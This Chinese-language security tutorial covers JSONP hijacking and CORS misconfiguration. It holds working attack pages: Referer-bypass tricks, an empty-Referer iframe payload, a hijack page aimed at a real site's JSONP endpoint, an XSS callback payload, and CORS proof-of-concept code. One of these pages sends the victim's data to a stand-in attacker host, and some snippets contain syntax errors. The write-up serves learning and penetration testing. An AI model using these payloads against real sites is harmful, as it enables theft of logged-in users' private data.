与跨域相关的 jsonp 劫持与 CORS 配置错误
参考文章:
CORS(跨域资源共享)错误配置漏洞的高级利用
JSONP劫持CORS跨源资源共享漏洞
JSONP绕过CSRF防护token
读取型CSRF-需要交互的内容劫持
跨域资源共享 CORS 详解
cors安全完全指南
GET请求-Referer限制绕过总结
跨域
什么是跨域:当一个请求url的协议、域名、端口三者之间任意一个与当前页面url不同即为跨域,跨域就是一个域名请求另外一个域名的资源
例如www.a.com网站请求www.b.com/b.js javascript文件,这就是跨域。
同源策略:同源策略是浏览器的一个安全功能,不同源的客户端脚本在没有明确授权的情况下,不能读写对方资源。
例如:
一个恶意网站(lol.pp.com)通过 iframe 标签将(lol.qq.com)引入进页面,由于用户安全意识不高,输入账号密码之后就开始了豪华十连抽。此时若没有同源策略的限制,那么钓鱼网站便可以通过 dom 操作获取到用户的账号密码、cookie
再比如,用户同时打开了一个恶意网站和一个受信任网站,此时若没有同源策略的限制,那个恶意网站上的脚本便可以操纵受信任网站,当用户在输入账号密码时,恶意网站便可以实现窃取
为什么要跨域:某些时候,我们需要获取别的域上的资源,比如别的受信任域上的 js 文件,来控制本页面的一些操作
跨域的方式有:
-
jsonp:
在HTML标签里,一些标签比如 script、img、link,iframe 这样的获取资源的标签是没有跨域限制的
jsonp 是服务器与客户端跨源通信的常用方法。
于是可以通过添加一个<script>元素,向服务器请求 JSON 数据,服务器收到请求后,将数据放在一个指定名字的回调函数的参数位置传回来。
另外 jsonp 只支持 get 请求,不支持 post 请求。发起请求时,带 cookie 发起请求。 -
CORS,即跨源资源共享(Cross-Origin Resource Sharing)。它允许浏览器向跨源服务器,发出XMLHttpRequest请求,从而克服了AJAX只能同源使用的限制。
同源策略(Same OriginPolicy)要求不同源之间是无法通信的,而CORS则是放宽同源策略以通过浏览器实现网站之间通信的机制。
CORS支持get和post请求,是 jsonp 的升级,可带 cookie 发起请求。
CSRF JSONP HiJacking
<script> 是不受跨域的限制的,因此比 cors 利用起来简单一点
json 和 jsonp 有什么区别:
- json:
{"name": "hacker" , "phone": "13888888888"}jsonp:callback({"name": "hacker" , "phone": "13888888888"}); - json是一种数据格式,而jsonp是一种协议
例如这样一个前端页面:
<script>
function test(data){
alert("name:"+data.name+"city:"+data.city);
}
</script>
<script src="http://trustedweb.com/info.php?callback=test"></script>
当执行到第二个 script 标签时,此页面会向目标网站发起请求,而目标网页返回了这样一个东西:
test({"name": "hacker" , "phone": "13888888888"});
这代表了什么?简单来说就是返回了一串执行函数的代码,括号内的数据(一个json格式的数据)就是传入函数的形式参数,然后就会调用前一个 script 内定义的 test 函数,执行相应操作
什么又是 jsonp 劫持呢? 用户访问了恶意网站,网站页面上存在恶意代码,模拟用户发起 jsonp 请求,并且将数据发送到黑客的服务器上。
为什么会发生 jsonp 劫持?
目标站点:
-
Referer过滤不严谨;
例如:
当网站只检测 Referer 里是否只存在 trustedweb.com 这个字符串时
攻击者可以构造特殊的域名来绕过:www.trustedweb.com.attacker.com或者:attacker.com?trustedweb.com -
空Referer(在通过跨协议调用JS时,发送的http请求里的Referer为空);
例如:
<iframe src="javascript:'<script>function JSON(o){alert(o.userinfo.userid);}</script><script src=http://www.qq.com/login.php?calback=JSON></script>'"></iframe>
代码里我们使用<iframe>调用 javscript 伪协议来实现空 Referer 调用 JSON 文件
我们也可以在 poc 代码里添加<meta name="referrer" content="never">,也可以是 Referer 置空 -
token无效可删除或者可重复利用;
4.若目标网站上存在 XSS 漏洞,那么便可以轻松绕过 Referer 限制,甚至是 token 限制
这里我们拿一个简单的例子来说明一下,百度搜索:inurl:?callback=
随便在网上找一个返回 jsonp 数据的网页:
假设这是一个敏感数据:https://jh.dianping.com/wedding/pro/jsonppage?resultType=DTO&tempkey=ShopBottomForM¶ms={%22cityId%22%3A885%2C%22shopType%22%3A55%2C%22slotId%22%3A21004%2C%22userId%22%3A%220%22%2C%22viewShopId%22%3A%22103060909%22}&callback=jsonp1
简单测试没有token限制,也没有referer限制
假设某恶意网站存在如下页面 evil.html,他想盗取你在目标网站上的敏感信息,而你是在登陆目标网站之后再访问的恶意网站,那么发起jsonp请求时就会带上你的cookie
<html>
<head>
<title>JSONP HiJacking</title>
<meta charset="utf-8">
<script type="text/javascript">
function evilfunc(data){
alert(JSON.stringify(data));
//这里可以写一些对json数据的处理,例如将其发送到黑客的服务器等
}
</script>
</head>
<body>
<h1 style="text-align:center;"> SORRY YOUR JSONP HAS BEEN HIJACKED!<h1>
<h1 style="text-align:center;">不知道有没有语法错误!</h1>
<script type="text/javascript" src="https://jh.dianping.com/wedding/pro/jsonppage?resultType=DTO&tempkey=ShopBottomForM¶ms={%22cityId%22%3A885%2C%22shopType%22%3A55%2C%22slotId%22%3A21004%2C%22userId%22%3A%220%22%2C%22viewShopId%22%3A%22103060909%22}&callback=evilfunc"></script>
</body>
</html>
当网页自身存在 XSS 漏洞的时候,有没有想到一些骚东西?对头,直接把这些代码写到存在 XSS 漏洞的页面,一旦其他用户访问该页面,那么也会导致 jsonp 劫持,完全不需要自己搭个网站骗人去点!
当然,若是网站存在任意 url 跳转漏洞,也可以直接让目标网站跳转到恶意网站,从而触发劫持
jsonp 劫持可能导致XSS:在jsonp数据返回包的响应头中,若 Content-Type 字段没有定义好,那么就会造成反射型 XSS 漏洞,例如http://trustedweb.com?callback=<svg/onload=alert(1)>
要避免该漏洞,需要严格定义 Content-Type: application/json
CORS 配置不当漏洞
CORS 配置不当通常会导致的危害是用户敏感信息泄露
当向A网站(trustedweb.com)某敏感页面发起如下请求时,带有 Origin 头,测试能否跨域访问
GET /api/sys/login HTTP/1.1
Host: trustedweb.com
********
Origin: http://whatever.com
- 若服务器返回:
Access-Control-Allow-Origin:http://whatever.com //若服务器返回该响应头,则表示允许 http://whatever.com 跨域访问
Access-Control-Allow-Credentials:true //若服务器返回该响应头,则表示允许 http://whatever.com 在跨域访问的时候带上 cookie
当允许跨域的时候,便可以在B网站(http://whatever.com)上构造恶意页面,然后诱导用户点击即可完成敏感信息窃取
POC:测试代码.html
<script>
function cors() {
var req = new XMLHttpRequest();
req.onreadystatechange = function() {
if(req.readyState === 4) {
alert(this.responseText);
}
}
req.open("GET","https://vulnerable.domain/api/private-data"+"参数",true);
req.withCredentials = true; //这里表示带上用户 cookie 发起请求
req.send();
}
cors();
</script>
payload:利用代码.html
<h1> You has been hacked! </h1>
<script>
var req = new XMLHttpRequest();
req.onreadystatechange = function() {
if(req.readyState === 4) {
location="//attacker.domain/log?response="+this.responseText;
}
req.open("get","https://vulnerable.domain/api/private-data"+'参数',true); //填写敏感信息页面的地址,与要传输的参数
req.withCredentials = true;
req.send();
</script>
当必须要 POST 参数到目标网站时,可以使用 POST 方式
在HTML代码中一定要有 req.setRequestHeader("Content-Type","application/x-www-form-urlencoded;"); 用 POST 的时候一定要有这句,用 GET 的时候可以不用这句
POC部分代码:
<script>
var data = "a=xxx;b=xxx;c=xxx;";
var req = new XMLHttpRequest();
req.onreadystatechange = function() {
if(xhr.readyState === 4) {
alert(this.responseText); //if 条件框里面可以改成将获取到的敏感数据发送服务器上
}
req.open("POST","https://vulnerable.domain/api/private-data"+"参数",true);
req.setRequestHeader("Content-Length",data.length);
req.setRequestHeader("Content-Type","application/x-www-form-urlencoded;"); //用POST的时候一定要有这句
req.withCredentials = true;
req.send(data);
</script>
- 若服务器返回空,则说明不允许任意网站跨域,那么便可以测试是否可以跨子域名
GET /api/sys/login HTTP/1.1
Host: trustedweb.com
********
Origin: http://aaa.trustedweb.com
若返回:
Access-Control-Allow-Origin:http://aaa.trustedweb.com
Access-Control-Allow-Credentials:true
则说明支持子域名跨域,那么便可以在子域名上寻找一个 XSS 漏洞,来打组合拳
XSS POC:测试代码
<script>
function cors()
{
var req = new XMLHttpRequest();
req.onreadystatechange = function()
{
if(req.readyState === 4) {
alert(this.responseText); //if 条件框里面可以改成将获取到的敏感数据发送服务器上
// 如:location=”//attacker.domain/log?response=”+this.responseText;
}
};
req.open("GET", "https://vulnerable.domain/api/private-data", true);
req.withCredentials = true;
req.send();
}
cors();
</script>
CORS配置不当测试利用工具:CrossSiteContentHijacking
